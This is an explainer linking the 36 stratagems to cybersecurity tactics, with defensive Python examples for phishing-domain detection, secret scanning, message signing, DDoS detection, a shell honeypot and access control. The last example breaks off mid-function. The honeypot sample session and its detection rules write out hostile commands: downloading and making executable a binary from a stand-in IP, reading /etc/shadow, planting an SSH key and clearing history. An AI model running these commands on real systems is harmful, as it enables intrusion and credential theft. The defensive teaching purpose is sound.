CyberSecurity

Many of the 36 stratagems can be carried out, or countered, with cybersecurity tools and tactics:

Hacking/malware (Stratagems 3, 13, 18, 21) - Spyware, phishing and network intrusions that steal data for intelligence gathering, disrupt operations, or enable extortion.

Social engineering (Stratagems 1, 4, 10, 31) - Manipulating human targets via impersonation, baiting, and other tricks to breach security.

OSINT (Stratagems 12, 15, 17) - Leveraging open source intel like social media to gain information advantages.

Encryption (Stratagems 21, 33) - Encrypting communications and data storage to enable covert coordination.

Anonymity (Stratagems 5, 23) - Using VPNs, Tor and cryptocurrency to mask online identities and activities.

Propaganda (Stratagems 9, 14, 26) - Spreading mis/disinformation via bots, fake accounts, media manipulation.

DDoS (Stratagems 6, 20) - Launching distributed denial of service attacks to disrupt and distract targets.

Honeypots (Stratagems 16, 28) - Setting up decoy systems to study attackers' methods.

Access controls (Stratagems 22, 30) - Strictly controlling access to systems and data to keep control of them.

Monitoring (Stratagems 3, 13, 18) - Logging, sniffing, auditing to detect anomalous activities.

Countermeasures draw on tools like intrusion prevention, firewalls, threat intelligence, access controls, audit logging, user training, and redundancy.

Hacking/Malware

Hacking techniques and malware can serve a variety of functions aligned with different stratagems:

Espionage - Malware like spyware (Stratagems 3, 13, 18) can be used to gather intelligence by stealing data from target systems. Advanced persistent threats (APTs) can lurk in networks long-term to monitor activities and exfiltrate sensitive information.

Disruption - Strategic hacking that takes down infrastructure (Stratagems 6, 20) can serve as a distraction or as denial of service. Wiper malware that destroys data is one example: the 2014 attack on Sony Pictures wiped data across the company's network and disrupted operations for weeks.

Extortion - Ransomware (Stratagem 5) encrypts files and holds them hostage until the victim pays for the decryption key. The 2021 Colonial Pipeline attack halted the largest fuel pipeline in the US for several days; the operator paid the ransom, but the attackers' decryptor was so slow that recovery relied largely on its own backups.

Botnets - By compromising many systems, botnets enable DDoS attacks, cryptojacking, and propaganda distribution (Stratagems 9, 14, 26). The Mirai botnet, built from compromised IoT devices, knocked DNS provider Dyn offline in 2016 and made major websites unreachable.

Infrastructure - Compromising key infrastructure through supply chain attacks can provide future access and control (Stratagems 16, 22, 30). The 2020 SolarWinds breach delivered a backdoor through trojanized Orion updates and gave the attackers access to US government agencies and private companies.

Defensive measures include prompt patching, access controls, malware scanning, penetration testing, anomaly monitoring, employee security training, and offline backups. Offensive cyber capabilities must be used with great care to avoid escalation.

Social Engineering

Social engineering manipulates human psychology and emotions rather than exploiting technical flaws to breach security. This aligns with several deception-based stratagems:

Impersonation - Attackers pose as trusted entities like IT staff to trick users into granting access or sharing sensitive information (Stratagem 1). Highly targeted spearphishing usually starts with impersonation of a colleague, vendor, or executive.

Baiting - Enticements like USB drives are left where victims will find them. Curiosity tempts them to plug the drive in, which runs the malware on it (Stratagem 4). Stuxnet is widely reported to have reached the air-gapped network of Iran's Natanz enrichment facility on a USB drive.

Pretexting - Inventing a plausible scenario to extract information, such as claiming to need data for an audit. LinkedIn profiles supply the names, titles and projects that make a pretext convincing (Stratagem 10).

Phishing - Mass emails that pretend to be legitimate lure users into entering credentials on fake sites (Stratagem 31). Even a small fraction of clicks is enough when the email goes to thousands of recipients.

Quid pro quo - Offering a small gift invites reciprocation. The CIA sent SD cards to targets in Lebanon as gifts, then monitored the targets' computers remotely once the cards were inserted (Stratagem 17).

Tailgating - Following authorized people through secured doors, hiding in plain sight (Stratagem 23).

Defenses include security awareness training for employees, email hygiene such as sender verification with SPF, DKIM and DMARC, restricting USB devices, physical access controls, monitoring for anomalous behavior, and independent verification procedures for sensitive requests. Social engineering exploits human tendencies rather than technical flaws, so training is essential.
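
Sender verification is where impersonation and phishing can be caught mechanically. The following is an added example, not code from the original article: it classifies the From: domain of a message as trusted (exact domain and DMARC passed), spoofed (exact domain but DMARC failed), lookalike (typosquat, homoglyph or the trusted domain embedded in a longer one) or unknown. TRUSTED_DOMAINS, the homoglyph table and the sample headers are assumptions constructed for illustration.

```python
"""Flag sender domains that impersonate a trusted domain.

Added example, not code from the original article. TRUSTED_DOMAINS, the
homoglyph table and the sample From: headers below are constructed for
illustration.
"""
import re
import unicodedata

TRUSTED_DOMAINS = {"example.com", "corp-payroll.example.com"}  # assumed

# Characters and digraphs attackers substitute because they look alike.
# Cyrillic a, e, o, p, c are visually identical to their Latin counterparts.
HOMOGLYPHS = {
    "0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
}


def skeleton(domain: str) -> str:
    """Collapse a domain to a skeleton so look-alikes compare equal."""
    d = unicodedata.normalize("NFKC", domain.lower().strip().rstrip("."))
    if "xn--" in d:  # punycode label: decode so the real Unicode letters are visible
        try:
            d = d.encode("ascii").decode("idna")
        except UnicodeError:
            pass
    for bad, good in HOMOGLYPHS.items():
        d = d.replace(bad, good)
    return d


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_sender(from_header: str, auth_results: str = "") -> str:
    """Return 'trusted', 'spoofed', 'lookalike' or 'unknown' for a From: header.

    auth_results is the Authentication-Results header added by the receiving
    mail server; an exact trusted domain is believed only if DMARC passed.
    """
    m = re.search(r"@([^\s>@]+)", from_header)
    domain = m.group(1).lower().rstrip(".") if m else ""
    if any(domain == t or domain.endswith("." + t) for t in TRUSTED_DOMAINS):
        return "trusted" if "dmarc=pass" in auth_results.lower() else "spoofed"
    skel = skeleton(domain)
    for trusted in TRUSTED_DOMAINS:
        ts = skeleton(trusted)
        if skel == ts or edit_distance(skel, ts) <= (2 if len(ts) >= 8 else 1):
            return "lookalike"          # examp1e.com, exarnple.com, exmaple.com
        if skel.startswith(ts + ".") or skel.startswith(ts + "-"):
            return "lookalike"          # example.com.login-verify.net
    return "unknown"


if __name__ == "__main__":
    # Constructed headers; the Authentication-Results values are illustrative.
    samples = [
        ("Payroll <hr@corp-payroll.example.com>", "spf=pass dkim=pass dmarc=pass"),
        ("CEO <ceo@example.com>", "spf=fail dkim=none dmarc=fail"),
        ("IT Support <helpdesk@examp1e.com>", ""),
        ("alerts@example.com.login-verify.net", ""),
        ("support@ex\u0430mple.com", ""),  # Cyrillic a
        ("news@unrelated.org", ""),
    ]
    for hdr, auth in samples:
        print(f"{classify_sender(hdr, auth):9s} {hdr}")
```

The edit-distance threshold trades false positives for coverage: with a short trusted domain a distance of 2 will also match legitimate neighbours, so the threshold scales with the domain length and a "lookalike" verdict should route the message to review rather than drop it outright.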

Open Source Intelligence

Publicly available information can offer valuable intelligence to inform influence operations and hacking targets:

Social media profiling - Profiles reveal personal information, photos that give away locations, affiliations, and opinions (Stratagems 12, 15). Profile data was used to target Russian influence advertising during the 2016 US election.

Public records - Valuable for reconnaissance on targets. Google hacking (dorking) uses advanced search operators to surface exposed documents such as court filings, property records, and patents (Stratagem 17).

Metadata - Information like geotags, author names, and timestamps embedded in documents and photos. Provides context for attacks or uncovers associations (Stratagem 33).

Online forums - Discussions reveal insider jargon, technical details, and frustrations that feed social engineering (Stratagem 4). Attackers lurk in forums like Reddit.

Code repositories - Public repositories on sites like GitHub expose credentials and API keys committed by mistake, internal hostnames, vulnerable code, and planning details developers forgot to remove. Great for reconnaissance (Stratagem 13).

Job sites - Résumés and profiles provide detailed work history, skills, affiliations, and contacts for spearphishing targets, and job postings reveal the technology stack a company runs (Stratagem 10).

Leaked data - Breaches dump credentials and personal data in bulk for public misuse. Reused passwords enable credential stuffing and further attacks (Stratagems 3, 18).

Defenses include being judicious in sharing personal information publicly online, locking down social media privacy settings, monitoring public data exposure, and assuming anything online may be leveraged for influence campaigns. Offensive OSINT requires careful ethics around privacy and transparency.
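
Monitoring your own public data exposure includes scanning what you publish in code repositories. The following is an added example, not code from the original article: a secret scanner that combines format-specific patterns (AWS key IDs, Slack tokens, private key blocks) with a generic `password = "..."` rule that is only trusted when the value is not a placeholder and has high Shannon entropy. The pattern table is a small subset of what real scanners carry, and SAMPLE_FILE with every key in it is constructed; none of the values are valid credentials.

```python
"""Scan repository text for leaked credentials before (or after) it is public.

Added example, not code from the original article. The pattern table covers
a few common key formats; SAMPLE_FILE and every key in it are constructed and
not valid credentials.
"""
import math
import re

PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "slack_token": re.compile(r"\bxox[baprs]-[0-9A-Za-z-]{10,}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
}
# Catch-all for `password = "..."`, `api_key: ...` and friends; needs an entropy check.
GENERIC = re.compile(
    r"(?i)(?:password|passwd|secret|api[_-]?key|token)[A-Za-z0-9_]*\s*[:=]\s*['\"]?([^\s'\"]{8,})")
PLACEHOLDERS = {"changeme", "password", "example", "xxxxxxxx", "your_key_here"}
ENTROPY_MIN = 3.0   # bits per char; randomly generated secrets are usually above 3.5


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def redact(value: str) -> str:
    """Never echo the full secret into a report or ticket."""
    return value[:4] + "****" + value[-2:] if len(value) > 8 else "****"


def scan_text(text: str):
    """Return [{'line': n, 'kind': k, 'value': redacted}, ...] for suspected secrets."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = [(k, m.group(0)) for k, p in PATTERNS.items() for m in p.finditer(line)]
        if not hits:
            # Fall back to the generic rule only when no specific format matched,
            # and skip templated values, placeholders and low-entropy strings.
            m = GENERIC.search(line)
            if m:
                val = m.group(1)
                if (not val.startswith(("${", "<", "%(", "{{"))
                        and val.lower() not in PLACEHOLDERS
                        and shannon_entropy(val) >= ENTROPY_MIN):
                    hits.append(("generic_secret", val))
        findings.extend({"line": lineno, "kind": k, "value": redact(v)} for k, v in hits)
    return findings


# Constructed sample: a settings file a developer might commit by mistake.
SAMPLE_FILE = """\
# settings.py (constructed sample, every value below is fake)
AWS_ACCESS_KEY_ID = "AKIAQ3ZXV7TPB2K9M4HJ"
AWS_SECRET_ACCESS_KEY = "Zq8vL3pTnW9xRb2mK7cJdH4yFs6uGa1eQo5iVt0B"
db_password = "changeme"
api_key = "${API_KEY}"
SLACK_TOKEN = "xoxb-123456789012-abcdefghijklmnopqrstuvwx"
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA...
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_FILE):
        print(f"line {f['line']:>3}  {f['kind']:<18} {f['value']}")
```

Run it over every file in a repository's history, not just the working tree: a key that was committed and then deleted is still in the git objects and still harvestable.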

Encryption

Strong encryption provides crucial protection for covert coordination and operations:

Secure comms - End-to-end encrypted messaging like Signal and WhatsApp and PGP-encrypted email protect against surveillance (Stratagems 21, 33) and prevent interception of instructions and shared intelligence.

Anonymity - Cryptocurrencies like Bitcoin allow payments without a bank identity, but they are pseudonymous rather than anonymous: every transaction is public, and blockchain analysis has traced many ransomware payments. Combined with mixers and encryption, tracking becomes harder (Stratagem 5). Ransomware demands payment in crypto.

Data security - Strong encryption applied properly secures sensitive data even if it is stolen and frustrates espionage (Stratagems 13, 18). In the 2016 Apple-FBI dispute, the FBI could not bypass an iPhone's encryption without Apple's help and eventually paid a third party for an exploit.

Code obscurity - Obfuscating malware with encrypted payloads (packers) and polymorphic code complicates analysis and detection (Stratagem 32). Slows reverse engineering.

Digital signatures - Public key cryptography proves the authenticity and integrity of messages or files (Stratagem 10). Any alteration invalidates the signature.

Access controls - Encryption complements access controls by strictly limiting decryption ability based on keys or credentials (Stratagems 22, 30). Enforces information compartmentalization.

Proper key management is essential to maintain security. Use well-vetted algorithms like AES for symmetric encryption and RSA or elliptic-curve schemes such as Ed25519 for public key operations. A large quantum computer would break RSA and elliptic-curve cryptography with Shor's algorithm (not brute force) and roughly halve the effective strength of symmetric keys, which is why post-quantum algorithms are being standardized. Defense depends on multilayered controls, not just crypto.
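
Digital signatures are the piece of the above that is easiest to get subtly wrong, so here is an added example, not code from the original article, of signing and verifying with Ed25519. Beyond detecting a tampered message it also rejects replays with a sequence number and uses a domain-separation tag so a signature over one message type cannot be reused for another. It needs the third-party cryptography package (pip install cryptography); CONTEXT, the order envelope format and the sample order are assumptions made for illustration.

```python
"""Sign messages with Ed25519 so recipients can detect tampering, key
substitution and replay.

Added example, not code from the original article. It needs the third-party
'cryptography' package (pip install cryptography). CONTEXT, the order format
and the sample order are assumptions made for illustration.
"""
import json

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric.ed25519 import (
    Ed25519PrivateKey,
    Ed25519PublicKey,
)

# Domain-separation tag: a signature over an order cannot be replayed as some
# other message type signed with the same key.
CONTEXT = b"ops-orders-v1\x00"


def generate_keypair():
    """Return (private key object, raw 32-byte public key)."""
    priv = Ed25519PrivateKey.generate()
    pub = priv.public_key().public_bytes(
        encoding=serialization.Encoding.Raw, format=serialization.PublicFormat.Raw
    )
    return priv, pub


def canonical(body: dict) -> bytes:
    """Deterministic JSON so signer and verifier hash exactly the same bytes."""
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def make_signed_order(priv: Ed25519PrivateKey, order: dict, seq: int) -> dict:
    """Wrap an order with a monotonically increasing sequence number and sign it."""
    body = {"seq": seq, "order": order}
    sig = priv.sign(CONTEXT + canonical(body))
    return {"body": body, "sig": sig.hex()}


def check_signed_order(pub_bytes: bytes, envelope: dict, last_seq: int):
    """Return (accepted, reason). Reject replays before doing any crypto."""
    body = envelope.get("body", {})
    if not isinstance(body.get("seq"), int) or body["seq"] <= last_seq:
        return False, "replayed or out-of-order sequence number"
    try:
        pub = Ed25519PublicKey.from_public_bytes(pub_bytes)
        pub.verify(bytes.fromhex(envelope.get("sig", "")), CONTEXT + canonical(body))
    except (InvalidSignature, ValueError):
        return False, "bad signature"
    return True, "ok"


if __name__ == "__main__":
    priv, pub = generate_keypair()
    env = make_signed_order(priv, {"action": "transfer", "amount": 100}, seq=1)
    print(check_signed_order(pub, env, last_seq=0))           # (True, 'ok')
    tampered = {"body": {"seq": 1, "order": {"action": "transfer", "amount": 100000}},
                "sig": env["sig"]}
    print(check_signed_order(pub, tampered, last_seq=0))      # bad signature
    print(check_signed_order(pub, env, last_seq=1))           # replay rejected
    _, other_pub = generate_keypair()
    print(check_signed_order(other_pub, env, last_seq=0))     # wrong key rejected
```

The verifier must know which public key to trust out of band; the signature proves the message came from whoever holds the matching private key, not that the key belongs to who you think. That binding is what key management and PKI supply, and it is why the public key is passed in rather than carried inside the envelope.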

Anonymity Tools

Maintaining anonymity online facilitates covert operations:

VPNs - Virtual private networks tunnel and encrypt traffic, hiding the user's IP address and location from the sites visited (Stratagems 5, 23) and allowing access from blocked regions. The VPN provider itself still sees the traffic, so a VPN shifts trust rather than removing it.

Tor - Routes traffic through layers of encrypted hops to anonymize activity (Stratagems 16, 21). Used by hackers, activists, whistleblowers.

Disposable emails - Temporary anonymous email services like Guerrilla Mail enable opening anonymous social media or messaging accounts (Stratagem 31). No real identity needed.

Cryptocurrency - Beyond payments, crypto lets operators buy VPNs, domains, and hosting from providers that require payment without linking a bank identity (Stratagems 7, 17).

OS tools - Tails Linux boots from USB, routes all traffic through Tor, and leaves no trace on the host by default. Qubes OS compartmentalizes activity into isolated virtual machines (Stratagem 28).

MAC spoofing - Changing a device's MAC address hides it from monitoring and access controls tied to hardware addresses (Stratagem 3), though only on the local network segment.

Chain proxies - Chaining together multiple proxy servers/hops disguises traffic origin (Stratagems 12, 33). Each sees only the next hop.

Defenses include monitoring network traffic for VPN/Tor use, implementing strict access controls based on roles, and behavioral analytics to detect anomalies suggesting account misuse. Multifactor authentication and device fingerprinting also help counter the anonymity risk.

Propaganda

Propaganda distributed online or through media channels serves several deception-based goals:

Misinformation - False or misleading content, often spread by people who believe it, such as cherry-picked data taken out of context (Stratagems 1, 10).

Disinformation - Deliberately fabricated content spread to deceive and sow confusion (Stratagems 6, 20). Used heavily in Russian interference operations. Makes it harder to discern truth.

Divisive narratives - Framing content in emotional ways that inflame tensions and polarize groups (Stratagems 9, 14, 33). Exploits societal divides.

Bot networks - Automated accounts that rapidly amplify narratives and drown out real debate on social media (Stratagems 26, 32). Create an illusion of consensus.

Media manipulation - Directly editing outlet content or restricting coverage to control narratives (Stratagem 16). Seen in state-run media outlets.

Deepfakes - AI-generated fake video/audio of world leaders or celebrities saying anything. High potential to deceive (Stratagem 4).

Astroturfing - Creating illusion of grassroots support for ideas by masking coordinated activity as organic (Stratagem 23). Used heavily by corporations.

Defenses include verifying sources, fostering critical thinking, diverse independent media, fact checking, moderating hate speech, requiring platforms to label or verify automated accounts, and codifying coordinated manipulation as an offense in cybercrime law. Offensive propaganda requires strong ethics to avoid deceiving and harming populations.

DDoS Attacks

Distributed denial of service (DDoS) attacks overwhelm targets with traffic to disable access:

Volumetric attacks - Flood links with junk traffic to saturate bandwidth and degrade network capacity (Stratagems 6, 20). Easy to execute; size is measured in gigabits or terabits per second.

Protocol attacks - Abuse weaknesses in protocols like TCP (SYN floods that exhaust connection tables) or reflect traffic off UDP services like DNS, NTP, and SSDP, which amplify a small spoofed request into a large reply (Stratagems 5, 16).

Application attacks - Target the application layer with forged requests and scripts that overload servers and databases (Stratagems 13, 18). Hammering expensive search or login endpoints exhausts database capacity with very little bandwidth.

Low-and-slow attacks - Traffic sparse enough to blend into noise, like Slowloris holding many half-open HTTP connections, still exhausts connection state on servers, firewalls, and IPS appliances (Stratagem 4). Challenging to detect.

Botnet attacks - Compromised devices (routers, cameras, servers) launch much larger DDoS attacks from distributed sources (Stratagems 3, 32). Boosts attack size and hides the origin.

Objectives vary from distraction, disruption, taking down infrastructure, crippling defenses, and obscuring other hacking activity. DDoS tactics continue evolving using encrypted, multi-vector, and pulse wave methods.

Defenses include overprovisioning bandwidth, using DDoS mitigation services that scrub traffic upstream, rate limiting and restricting traffic sources, anycast distribution, and having contingency plans ready.
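
The attack types above leave different fingerprints in flow records, and telling them apart decides which mitigation to trigger. The following is an added example, not code from the original article: it buckets flows per destination and second and raises a volumetric alert on bytes per second, a SYN flood alert on SYN-only flows, a reflection alert on large UDP replies from known amplifier ports, and a low-and-slow alert when one source holds many long-lived connections that carry almost no data. The thresholds are assumed starting points to tune against a real baseline, and the traffic is constructed, one attack type per second followed by a quiet second.

```python
"""Detect DDoS patterns in flow records: volumetric floods, SYN floods,
UDP reflection, and low-and-slow connection exhaustion.

Added example, not code from the original article. Thresholds are assumed
starting points to tune per environment; the flow records are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Flow:
    ts: float        # start time, seconds
    src: str
    sport: int
    dst: str
    dport: int
    proto: str       # "tcp" or "udp"
    flags: str       # TCP flags seen, e.g. "S", "SA"; "" for UDP
    nbytes: int
    duration: float  # seconds the flow stayed open


THRESHOLDS = {            # assumed; tune to the protected service's baseline
    "bytes_per_sec": 50_000_000,
    "syn_per_sec": 500,
    "reflect_per_sec": 200,
    "slow_conns_per_src": 50,
}
REFLECTOR_PORTS = {19, 53, 123, 161, 1900, 11211}   # chargen, DNS, NTP, SNMP, SSDP, memcached


def detect(flows, thresholds=THRESHOLDS):
    """Bucket flows per (destination, second) and return (dst, second, kind, detail)."""
    buckets = defaultdict(list)
    for f in flows:
        buckets[(f.dst, int(f.ts))].append(f)

    alerts = []
    for (dst, sec), fs in sorted(buckets.items()):
        total = sum(f.nbytes for f in fs)
        syns = sum(1 for f in fs if f.proto == "tcp" and f.flags == "S")
        refl = sum(1 for f in fs if f.proto == "udp" and f.sport in REFLECTOR_PORTS
                   and f.nbytes > 1000)
        slow = defaultdict(int)   # long-lived, barely-used TCP connections per source
        for f in fs:
            if f.proto == "tcp" and f.duration >= 30 and f.nbytes < 500:
                slow[f.src] += 1

        if total > thresholds["bytes_per_sec"]:
            alerts.append((dst, sec, "volumetric", f"{total / 1e6:.0f} MB/s"))
        if syns > thresholds["syn_per_sec"]:
            alerts.append((dst, sec, "syn_flood", f"{syns} SYN-only flows"))
        if refl > thresholds["reflect_per_sec"]:
            alerts.append((dst, sec, "reflection", f"{refl} large UDP replies from reflector ports"))
        for src, n in slow.items():
            if n > thresholds["slow_conns_per_src"]:
                alerts.append((dst, sec, "low_and_slow", f"{src} holds {n} idle connections"))
    return alerts


def sample_flows():
    """Constructed traffic: one attack type per second, then a quiet second."""
    target = "203.0.113.10"
    flows = []
    for i in range(12_000):   # 60 MB in one second from thousands of sources
        flows.append(Flow(100.0 + i / 12_000, f"10.{i % 250}.{(i // 250) % 250}.{i % 200}",
                          40000 + i % 1000, target, 80, "udp", "", 5000, 0.0))
    for i in range(800):      # SYN flood: SYN-only flows, 60 bytes each
        flows.append(Flow(101.0 + i / 800, f"198.18.{i % 250}.{i % 200}", 1024 + i,
                          target, 443, "tcp", "S", 60, 0.0))
    for i in range(80):       # Slowloris-style: one source holding idle connections open
        flows.append(Flow(102.0 + i / 80, "198.51.100.7", 50000 + i, target, 80,
                          "tcp", "SA", 200, 120.0))
    for i in range(300):      # NTP reflection: big UDP replies from source port 123
        flows.append(Flow(103.0 + i / 300, f"192.0.2.{i % 250}", 123, target, 80,
                          "udp", "", 1400, 0.0))
    for i in range(50):       # Normal web traffic
        flows.append(Flow(104.0 + i / 50, f"10.1.1.{i}", 40000 + i, target, 443,
                          "tcp", "SA", 20_000, 0.5))
    return flows


if __name__ == "__main__":
    for dst, sec, kind, detail in detect(sample_flows()):
        print(f"t={sec} {dst} {kind:12s} {detail}")
```

Fixed one-second buckets are the simplest form; an attack straddling a bucket boundary is diluted across two buckets, so a production detector uses a sliding window or an EWMA of the same counters. Note also that the low-and-slow rule keys on a source holding connections open, which is why it catches a pattern that a pure bytes-per-second threshold never would.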

Honeypots

Honeypots are decoy systems designed to attract and study attackers:

Distraction - High-interaction honeypots emulate real systems to divert and occupy adversary time and focus (Stratagems 16, 28).

Detection - Any activity in the isolated honeypot indicates malicious reconnaissance and probing (Stratagem 13). Quickly exposes methods.

Intelligence - Detailed logging reveals tactics, tools, and objectives by safely letting attacks proceed in the contained honeypot (Stratagems 3, 18).

Dilution - Flooding attackers with honeypots wastes time and resources attempting to compromise fake assets (Stratagem 4).

Deception - Fake data in honeypots masks real valued assets and provides believable but useless intelligence to attackers (Stratagems 10, 17).

Honeypots must be carefully monitored and isolated; they carry risks if compromised themselves, and highly skilled attackers may detect and avoid them. Integrated into a larger defense, they provide supplemental detection and intelligence on attacks.
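
The detection, intelligence and deception roles above all come down to what the honeypot does with each command an attacker types. The following is an added example, not code from the original article: the session logic of a low-interaction shell honeypot that answers commands with canned output (including decoy credential data), records everything, extracts download URLs as indicators, and tags the session by behaviour. The fake hostname, decoy /etc/passwd entries, rule table and SAMPLE_SESSION are constructed, and the TCP/SSH listener is omitted so the logic runs offline; nothing the attacker types is ever executed.

```python
"""Session logic for a low-interaction shell honeypot: answer attacker
commands with canned output, record every command, extract indicators and
tag the session by behaviour.

Added example, not code from the original article. The fake hostname, decoy
/etc/passwd entries, rule table and SAMPLE_SESSION are all constructed; the
TCP/SSH listener is omitted so the logic runs offline.
"""
import re

FAKE_HOST = "db-prod-02"   # assumed decoy name; looks like a valuable target

# Canned replies keyed by exact command. Nothing is ever really executed.
CANNED = {
    "whoami": "root",
    "id": "uid=0(root) gid=0(root) groups=0(root)",
    "uname -a": f"Linux {FAKE_HOST} 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 x86_64 GNU/Linux",
    "hostname": FAKE_HOST,
    "cat /etc/passwd": ("root:x:0:0:root:/root:/bin/bash\n"
                        "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n"
                        "svc_oracle:x:1001:1001::/home/svc_oracle:/bin/bash"),
    # Decoy hash: believable but useless data for the attacker to carry off
    "cat /etc/shadow": "root:$6$decoy$notarealhash:19000:0:99999:7:::",
}
SILENT = {"cd", "chmod", "echo", "rm", "mkdir", "export", "unset", "history", "touch"}

# (tag, regex) checked in order; first match wins.
RULES = [
    ("credential_access", re.compile(r"/etc/shadow|\.ssh/id_|\.bash_history|\.aws/credentials")),
    ("persistence", re.compile(r"authorized_keys|crontab|/etc/rc\.local|systemctl enable")),
    ("defense_evasion", re.compile(r"^(history -c|unset HISTFILE|rm -rf /var/log)")),
    ("tool_download", re.compile(r"^(wget|curl|tftp|ftpget)\b")),
    ("recon", re.compile(r"^(whoami|id|uname|hostname|ps|netstat|ss|ifconfig|ip a|"
                         r"cat /proc/cpuinfo|cat /etc/(passwd|issue|hosts)|ls|w)\b")),
]
URL_RE = re.compile(r"https?://[^\s'\"]+")
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\|)\s*")   # naive split; ignores shell quoting


class HoneypotSession:
    def __init__(self, peer_ip: str):
        self.peer_ip = peer_ip
        self.log = []        # every command with its tag: the intelligence product
        self.iocs = []       # URLs the attacker tried to pull tools from

    def _classify(self, cmd: str) -> str:
        for tag, rx in RULES:
            if rx.search(cmd):
                return tag
        return "other"

    def _respond(self, cmd: str) -> str:
        if cmd in CANNED:
            return CANNED[cmd]
        prog = cmd.split()[0]
        if prog in ("wget", "curl"):
            # Pretend the download worked so the attacker reveals the next step
            target = (URL_RE.search(cmd) or re.search(r"\S+", cmd)).group(0)
            return f"Connecting to {target}... connected.\n200 OK"
        if prog in SILENT:
            return ""
        return f"bash: {prog}: command not found"

    def handle(self, line: str) -> str:
        """Process one input line (possibly several chained commands); return output."""
        outputs = []
        for cmd in filter(None, (c.strip() for c in SPLIT_RE.split(line))):
            tag = self._classify(cmd)
            self.log.append({"cmd": cmd, "tag": tag})
            self.iocs.extend(u for u in URL_RE.findall(cmd) if u not in self.iocs)
            outputs.append(self._respond(cmd))
        return "\n".join(o for o in outputs if o)

    def summary(self) -> dict:
        tags = {e["tag"] for e in self.log} - {"other"}
        severity = "high" if tags & {"persistence", "tool_download", "credential_access"} else "low"
        return {"peer": self.peer_ip, "commands": len(self.log), "tags": tags,
                "iocs": list(self.iocs), "severity": severity}


# Constructed attacker session typical of an automated SSH bot.
SAMPLE_SESSION = [
    "uname -a; id",
    "cat /etc/passwd",
    "cat /etc/shadow",
    "wget http://203.0.113.55/x86.bin -O /tmp/.x && chmod +x /tmp/.x",
    "echo 'ssh-rsa AAAAB3... attacker@kali' >> ~/.ssh/authorized_keys",
    "history -c",
]

if __name__ == "__main__":
    s = HoneypotSession("198.51.100.23")
    for line in SAMPLE_SESSION:
        print(f"$ {line}\n{s.handle(line)}")
    print(s.summary())
```

The canned-response table is also the honeypot's weakest point: a skilled attacker probes for inconsistencies (a kernel version that does not match the package list, a download that "succeeds" without producing a file), which is the detection-and-avoidance risk noted above. The session log and the extracted IOCs are what feed the rest of the defense.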

Access Controls

Managing access to systems and data is crucial for maintaining control:

Authentication - Requiring usernames/passwords, multi-factor authentication, biometrics, etc. to validate identity and authorize access (Stratagems 22, 30).

Least privilege - Only granting the minimum access needed for specific roles and responsibilities limits exposure (Stratagem 25).

Compartmentalization - Segmenting and restricting access to certain projects and activities aids secrecy (Stratagem 33).

Time controls - Limiting when users can login narrows exposure, like disabling accounts after-hours (Stratagem 23).

Remote access - Requiring VPNs, zero trust models, and IP allowlisting controls the entry points attackers target (Stratagems 5, 21).

Behavioral - Analyzing patterns like time, location, activities detects anomalies suggesting account misuse or insider threats (Stratagem 18).

Perimeter - Firewalls, allowlisting, microsegmentation, DMZ zones control traffic and access between network segments (Stratagems 12, 15).

Physical - Video surveillance, guards, badges, biometrics manage physical access to facilities housing systems (Stratagem 28).

Applying the principles of least privilege and zero trust networking is key. Audit logs should record every access decision. Controls must be flexible enough for legitimate usage.
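
Most of the controls above (role permissions, time windows, remote-access allowlists, MFA, compartments) belong in one authorization check that defaults to deny. The following is an added example, not code from the original article, of such a check evaluated against a set of sample requests. ROLE_PERMISSIONS, ROLE_POLICY, PROJECT_MEMBERS and SAMPLE_REQUESTS are assumptions constructed for illustration.

```python
"""Central authorization check applying least privilege, time windows,
network allowlists, MFA and project compartments, defaulting to deny.

Added example, not code from the original article. ROLE_PERMISSIONS,
ROLE_POLICY, PROJECT_MEMBERS and SAMPLE_REQUESTS are assumptions for illustration.
"""
import ipaddress
from datetime import datetime, time, timezone

ROLE_PERMISSIONS = {                      # least privilege: only what the role needs
    "analyst":    {"tickets:read", "logs:read"},
    "admin":      {"tickets:read", "tickets:write", "users:write", "logs:read"},
    "contractor": {"tickets:read"},
}
ROLE_POLICY = {
    # hours are UTC; None means unrestricted. networks None means any source.
    "analyst":    {"hours": None, "networks": None, "mfa": True},
    "admin":      {"hours": None, "networks": ["10.0.0.0/8"], "mfa": True},
    "contractor": {"hours": (time(8, 0), time(18, 0)), "networks": ["198.51.100.0/24"], "mfa": False},
}
PROJECT_MEMBERS = {"project-x": {"alice", "bob"}}   # compartmentalized projects


def authorize(user, role, action, src_ip, when, mfa=False, project=None):
    """Return (allowed, reason). Any failed check denies; nothing is implied."""
    perms = ROLE_PERMISSIONS.get(role)
    policy = ROLE_POLICY.get(role)
    if perms is None or policy is None:
        return False, f"unknown role {role!r}"
    if action not in perms:
        return False, f"{role} is not permitted {action}"
    if policy["hours"]:
        start, end = policy["hours"]
        if not start <= when.astimezone(timezone.utc).time() <= end:
            return False, f"{role} access not allowed at {when.strftime('%H:%M')} UTC"
    if policy["networks"]:
        addr = ipaddress.ip_address(src_ip)
        if not any(addr in ipaddress.ip_network(n) for n in policy["networks"]):
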